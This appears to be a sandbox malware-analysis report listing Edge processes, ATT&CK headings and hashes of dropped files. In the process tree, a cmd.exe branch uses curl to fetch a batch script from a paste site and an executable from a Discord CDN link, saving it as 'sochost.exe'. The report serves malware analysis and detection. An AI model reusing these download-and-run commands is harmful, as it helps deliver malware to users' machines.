- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4797638539303213445,12813214606770469225,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
    3⤵
    PID:5336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tria.ge/
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:680
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe99fa46f8,0x7ffe99fa4708,0x7ffe99fa4718
    3⤵
    PID:2716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,12133108739723981581,10432610272268061999,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5820

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5536

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:5796
- C:\Windows\system32\curl.exe
  curl -s -o i.bat https://rentry.co/fg2/raw
  2⤵
  PID:5724
- C:\Windows\system32\curl.exe
  curl -o sochost.exe https://cdn.discordapp.com/attachments/1132373817147265064/1132643560722808934/x.exe
  2⤵
  PID:1724
- C:\Windows\system32\timeout.exe
  Timeout /t 0 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3340
- C:\Windows\system32\timeout.exe
  Timeout /t 0 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4048

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\3ac111cc-0bce-405f-aebc-4d34382451ee.tmp

Filesize
2KB

MD5
9b500846ea029598a1116275bd3ce751

SHA1
8b9e1ad8f30f12f090706467c8afd9a4a229539d

SHA256
6432c2cda14a54724160a7bab1daac158e841603a5898c4a124c7a0f731e1009

SHA512
ff614158e11c61d64ace4bc38631ba84c914201f03a1dd0004d677cd83f0ec7bffd0626fdc4ff07188f496ff32d680f6f2e301ffc7c9d00418723701e879e12e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
940662a1a388839e412c56bb6fb81aa4

SHA1
b39d2f685fb503190e6697c7903befed21f24228

SHA256
2951459d6e3f70ae0e925ed3a3d6685402c975d05a1f97bed7d1ab344414539c

SHA512
d27811df34812a08f023bd459c785a233c5687d48d4eb117385c996ea34d63a3074ea6a3db1f6b44cad6a7f954a449d101d88e34ba8dfb33dbde0e88a3f08872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
940662a1a388839e412c56bb6fb81aa4

SHA1
b39d2f685fb503190e6697c7903befed21f24228

SHA256
2951459d6e3f70ae0e925ed3a3d6685402c975d05a1f97bed7d1ab344414539c

SHA512
d27811df34812a08f023bd459c785a233c5687d48d4eb117385c996ea34d63a3074ea6a3db1f6b44cad6a7f954a449d101d88e34ba8dfb33dbde0e88a3f08872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
940662a1a388839e412c56bb6fb81aa4

SHA1
b39d2f685fb503190e6697c7903befed21f24228

SHA256
2951459d6e3f70ae0e925ed3a3d6685402c975d05a1f97bed7d1ab344414539c

SHA512
d27811df34812a08f023bd459c785a233c5687d48d4eb117385c996ea34d63a3074ea6a3db1f6b44cad6a7f954a449d101d88e34ba8dfb33dbde0e88a3f08872

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
65KB

MD5
8b78c2e7a2ba559f2827fe33d2a71fcb

SHA1
1f3808baaf2b0338437d7d43c4d44b7db2157234

SHA256
4e2fd2a28f64ed533cd1fe39b8825172a0c30b370b9fd5bb96e434ea419b3045

SHA512
f417b232b35d53d2f441d6636f8fcc4fe9dc4a0ff344ae7ce6f45c7a451a61277a19a94581ba88ed65d04d386132ed32c7805ae0d91a34ddf3c1f9be7e50031b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
66KB

MD5
bbe66786e8c9957c3e5311dad0047a15

SHA1
41ac837791e470d3227ae4a68782cae691bf3a98

SHA256
fe0f1d8b6263a16c3c6fb03fd592d88984f7f632761ec998048e4385388df4e0

SHA512
38700277be325aeab0d23090f08ca371522637a2d886da0181d6d12fe0d48b0ed26f6ae47e4137fc1ddb522587f99ac259298a3f73bd21675c23b39430c3fd30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
30KB

MD5
5eda80ed3c547eb829898293dd4fba99

SHA1
6934ab3c16605df3636d8b96545a891ef437d407

SHA256
850c713c9267f7902e4f4eb332db857ff6e616b5081c0d5cd1f8583624d6e97c

SHA512
d6bb6837e27421d551edf053eb99c6a0ba68e45f14e00fb7d8c14b72eaf0af849ff2161a3f6d63c1813e00bd787ccbd140e52947c33db19ca34b26baba7c14ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
7955d0b22a79e48b5c4f6f2e629d8ba8

SHA1
b642186388c1a0974eeb624138399f86baf5578f

SHA256
f8598206c41da7bdf4936c0e0dcdcb1bfc219a800f06f27cbffba8c7b975d278

SHA512
6a96777cc7c24e1aace018c7e0531a6908f7530109257c1f504fe099bc9a251492f630ebeed3566fbe8aa786af5ca451aef64b4fdcea2734cb1b98624adb08b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
450B

MD5
7d76b63707039d266cf73488a3506995

SHA1
2665776c9d8fd6d8d2918aca43f9a067225b95b9

SHA256
5a9c95788cfc318dfb19088a7c2d62d9e5e3ee56c8d8164c24252abf93bf74bb

SHA512
54fe449597be2f134c8c53031b7d89ce245d2e8bbf6ba184a92378b459a232ff4027f2c64759050ad5cf0e5ff9a7a4510e19e929d7081a7ccf4eaecc704b2e73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cb9ee9a01da529ed6585588852e0c54a

SHA1
ef9891fc68d984afa308035ce747970526907418

SHA256
da497b487b26b93f76fbc09635f658340681927a21b3eb12c3a7f24e151c446f

SHA512
8001e3489dec0ad0b1e3d269207364a879bc70643be1a71b65fc2dd8d7f0ca4ddfc9755bcc5bcc98839966d6b19c632821a868d3f0a482eebb7e14e80247a569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
87f50b193f37c1c7a9093d6e6240a143

SHA1
621c76dfb35b696cc8ad22e675e13d7c885b65db

SHA256
31a82d82f378fdd873092874fe9b97990d9577717b5be73aba80f0e8555c87b0

SHA512
ff2f18a98541049f8d16227234a0c132e6d173a196ef3f9700a0aabd30743e489199ae6775e66791d85d799f9e72f27f7e1ff21ddc85e48b4ef7967fcf75d997

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a17aeeef303fce2efcdf67e8704cca11

SHA1
1fe4d2835f54ba84adcee20333a8837b73639a1a

SHA256
8930a64dc47d46fa84e6cbbd09ffd89607652611b668789a9f78bb8a302dcef7

SHA512
f6d2468c29139be098dd3b237ec4372e931b1a0cfffd9ee66fbec47f5afc87a32cdb27539be76a78a6d11e8216ec5fd44ea4cdfa6a053c96aee66ac6ad0434ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ca36933e6dea7aa507a272121b34fdbb

SHA1
3b4741ca0308b345de5ecf6c3565b1dbacb0fb86

SHA256
fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d

SHA512
5a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
371B

MD5
3bd899884f0bef806d241f4e76384b87

SHA1
dd6c8a40d9870a031fa1653a6771a202ae198b4a

SHA256
7337e36544d2798f2455cf3caf84cee1dcab494b9157cb7f391c61919cc0b8ba

SHA512
bf186b8e9f5ccaab30726c09d096e9dc46cd43f06935b40b561d7079326f3a5aca5c8eb8f7d23e19777375f0a7aafe703a2069374401edf07d0854d2274b4bcb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5868b8.TMP

Filesize
204B

MD5
2f7823b50e38dfd6e40ec7043518b624

SHA1
3e45fbd43aff714f5171e77e8a254679036fc0fe

SHA256
cfbaeaef257c1fad31d8c2a5cf1ce0779d35db32ea7629fe244bb4356efe75fe

SHA512
2e1931107eb2dcc38dc53e6730c6df20e1755cb84015df52a6279782a91e1b2bfe8975c21003d16cce0f809f54c9038d79817b73a0b63a2492b0538385a21490

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a479ca0e-616c-441a-b839-3db522532528.tmp

Filesize
6KB

MD5
1952a4c7fe654e136d788c98a65528e9

SHA1
deb4450d1b35480e3a3afc4229be5f0ae130caa5

SHA256
b9618574676161587f1586ab1ee76393ed4876324f747ae88f6c71fb2ea1da4b

SHA512
cf0fedf8ad4c9d11504a0c0482c25a33ab27903733bc2d774ba0adaea6cba1350aebee142d20b1d8ee1e85dfbcf2ff0fb9872f92179aa777dac4fe5e323e86f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
9b500846ea029598a1116275bd3ce751

SHA1
8b9e1ad8f30f12f090706467c8afd9a4a229539d

SHA256
6432c2cda14a54724160a7bab1daac158e841603a5898c4a124c7a0f731e1009

SHA512
ff614158e11c61d64ace4bc38631ba84c914201f03a1dd0004d677cd83f0ec7bffd0626fdc4ff07188f496ff32d680f6f2e301ffc7c9d00418723701e879e12e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
bc096e4b71d16389ff1a63716cb6131b

SHA1
e656379afd1b8ba5c10adec14e4ce7b5afc83c88

SHA256
5b0254bf459020dbdfb173d5e7894a0c4937bb18cb22d9f6de8382a37dfbd477

SHA512
d5b8399e4290b94c10829513edad5e0ce77c12f155012666f7324e1838f64abaa61e650d7befb54a249b2878628bcf6432af436ee097d9b7edaa54d43917e53e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
bc096e4b71d16389ff1a63716cb6131b

SHA1
e656379afd1b8ba5c10adec14e4ce7b5afc83c88

SHA256
5b0254bf459020dbdfb173d5e7894a0c4937bb18cb22d9f6de8382a37dfbd477

SHA512
d5b8399e4290b94c10829513edad5e0ce77c12f155012666f7324e1838f64abaa61e650d7befb54a249b2878628bcf6432af436ee097d9b7edaa54d43917e53e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
f46fd391dd44d926e4dd181b2ace22aa

SHA1
e16910605507d4297a85938cee1601484212ca3c

SHA256
bba1801c50aeee6be6fc7810ea57ad04c9b50232b55789faaf782a8194e4995e

SHA512
f560d35da7f6c7145055dd2fa0fb839e6446649ae785d8f8c95cb783a9326e7d36924bd9dfae291b6a7bcdcc812ce7fe1618da2e3a2931f67aa6c413b3b08bae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
f46fd391dd44d926e4dd181b2ace22aa

SHA1
e16910605507d4297a85938cee1601484212ca3c

SHA256
bba1801c50aeee6be6fc7810ea57ad04c9b50232b55789faaf782a8194e4995e

SHA512
f560d35da7f6c7145055dd2fa0fb839e6446649ae785d8f8c95cb783a9326e7d36924bd9dfae291b6a7bcdcc812ce7fe1618da2e3a2931f67aa6c413b3b08bae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
bc096e4b71d16389ff1a63716cb6131b

SHA1
e656379afd1b8ba5c10adec14e4ce7b5afc83c88

SHA256
5b0254bf459020dbdfb173d5e7894a0c4937bb18cb22d9f6de8382a37dfbd477

SHA512
d5b8399e4290b94c10829513edad5e0ce77c12f155012666f7324e1838f64abaa61e650d7befb54a249b2878628bcf6432af436ee097d9b7edaa54d43917e53e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
f46fd391dd44d926e4dd181b2ace22aa

SHA1
e16910605507d4297a85938cee1601484212ca3c

SHA256
bba1801c50aeee6be6fc7810ea57ad04c9b50232b55789faaf782a8194e4995e

SHA512
f560d35da7f6c7145055dd2fa0fb839e6446649ae785d8f8c95cb783a9326e7d36924bd9dfae291b6a7bcdcc812ce7fe1618da2e3a2931f67aa6c413b3b08bae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
6fb85e6a73ec094baeebcc465d867ffe

SHA1
8fdb41cdfff6ad5408449ea5acf7dabcf73fc601

SHA256
63a2b730b2937a6623223a3814bcecf9af0dc789a559e250dd90f0afbf616ee8

SHA512
5030319e8f44b9679c7cc5c883670b6f5876d76d108c08e18b2d8b0e50128c1b5bb93bcdf427c19116c9a6d1aeabc7f07f47962d8a68f10ea8cb73180107d388

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
9d49b3095ea743e9dcaf1887378c12da

SHA1
749019a1dd02efaa56f50bb4fe51390fb13ffd0d

SHA256
2d8b4c7dc2d242afce4f843783c94bf99998fcbd19020fd0d3325e51629f6362

SHA512
c29670d8ca63fc86c154aea6aabafc24e7d3c0da51238c0640ad67a3831dcfc824ef90200eec22121528525e517bf8c301959d2d9738acaef9494759fab65c03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
04c69db5b899be606a7c28c99f746f41

SHA1
178a23ceb8971c052f82b6ae68d0e875ab7aa435

SHA256
606988329ebe126c2f2d74962f5e353693bbc8e89a1b34fc18e4309653e3e1df

SHA512
559d56277192a7da4567ba02e20c853cc089ca428c224904b5ca2af7bdc4fef915c32a2269cfe75f10b4a5f01757f65b7452175745574bc1d12a91461a2fd721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
b9e7ee5d4267263831a3abbc726bf485

SHA1
4269b38b7b2c646f1e063397524ad499f774249a

SHA256
5c99720173f8f2e1f58c3399ae3211be81e5cdbccceb1251688c965782679ef3

SHA512
90ae76dc5e4e6bc101c43cc861c6e21f8dedfab1648d22065b70da87955065f02399185a4b6ba79d2e0349b3557019faf5305d1416af15e67ddc5b1a6831dee2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
b9e7ee5d4267263831a3abbc726bf485

SHA1
4269b38b7b2c646f1e063397524ad499f774249a

SHA256
5c99720173f8f2e1f58c3399ae3211be81e5cdbccceb1251688c965782679ef3

SHA512
90ae76dc5e4e6bc101c43cc861c6e21f8dedfab1648d22065b70da87955065f02399185a4b6ba79d2e0349b3557019faf5305d1416af15e67ddc5b1a6831dee2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
9b500846ea029598a1116275bd3ce751

SHA1
8b9e1ad8f30f12f090706467c8afd9a4a229539d

SHA256
6432c2cda14a54724160a7bab1daac158e841603a5898c4a124c7a0f731e1009

SHA512
ff614158e11c61d64ace4bc38631ba84c914201f03a1dd0004d677cd83f0ec7bffd0626fdc4ff07188f496ff32d680f6f2e301ffc7c9d00418723701e879e12e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
9d49b3095ea743e9dcaf1887378c12da

SHA1
749019a1dd02efaa56f50bb4fe51390fb13ffd0d

SHA256
2d8b4c7dc2d242afce4f843783c94bf99998fcbd19020fd0d3325e51629f6362

SHA512
c29670d8ca63fc86c154aea6aabafc24e7d3c0da51238c0640ad67a3831dcfc824ef90200eec22121528525e517bf8c301959d2d9738acaef9494759fab65c03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
9d49b3095ea743e9dcaf1887378c12da

SHA1
749019a1dd02efaa56f50bb4fe51390fb13ffd0d

SHA256
2d8b4c7dc2d242afce4f843783c94bf99998fcbd19020fd0d3325e51629f6362

SHA512
c29670d8ca63fc86c154aea6aabafc24e7d3c0da51238c0640ad67a3831dcfc824ef90200eec22121528525e517bf8c301959d2d9738acaef9494759fab65c03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
9985c6fa6c0259fb6ec5d6dce945a935

SHA1
31627f827d545d525e3f0011c5c877a0814785a1

SHA256
ba9a5ad1913cd3645b9a8326dc136a033a76b3cd91772f769c68d2bed2c25ed3

SHA512
a42a2e72989c569b0ee84bceb197419fc1cd21a7f9be6a62717b9430694307360e48d64683e89be201a635a7602dfb94e04c9db813059c5f8e3fb2df7afca21c

Download Submit
C:\Users\Admin\AppData\Local\Temp\i.bat

Filesize
460B

MD5
71332b96c9a417640014796385cb8067

SHA1
56f4975f1a874046c7fa2fe516fd920c2bb9dc34

SHA256
39c663eecefa82922d100ef596db1d9aa8345f5cd6e78d226ac3e29f76df82af

SHA512
23deae08076094ddd614bc95f93159a6c84e9a912ea019ee83703fd1343b62cd982e76417c597d84f7bac3567cbebb7f5b944dc963974eb5e26c3d6d0e3e0152

Download Submit
C:\Users\Admin\AppData\Local\Temp\sochost.exe

Filesize
227B

MD5
a588137b2dca9e7617b7a10ef93cb420

SHA1
e700b9930ad6bfd3e83f964db9f965fdb6048111

SHA256
94a5226a485ab605b4e08e77843041383e2ed432f6ff39db76993d8f4ab70bf9

SHA512
8ef0bc9a728f58d9c90e710dcc3f802eced67206f348a21089ec0bce71291e83f4edd2c2a6bbe84fa4bf346afd02bb96c8497d26eed4a15b8df438e846ee4157

Download Submit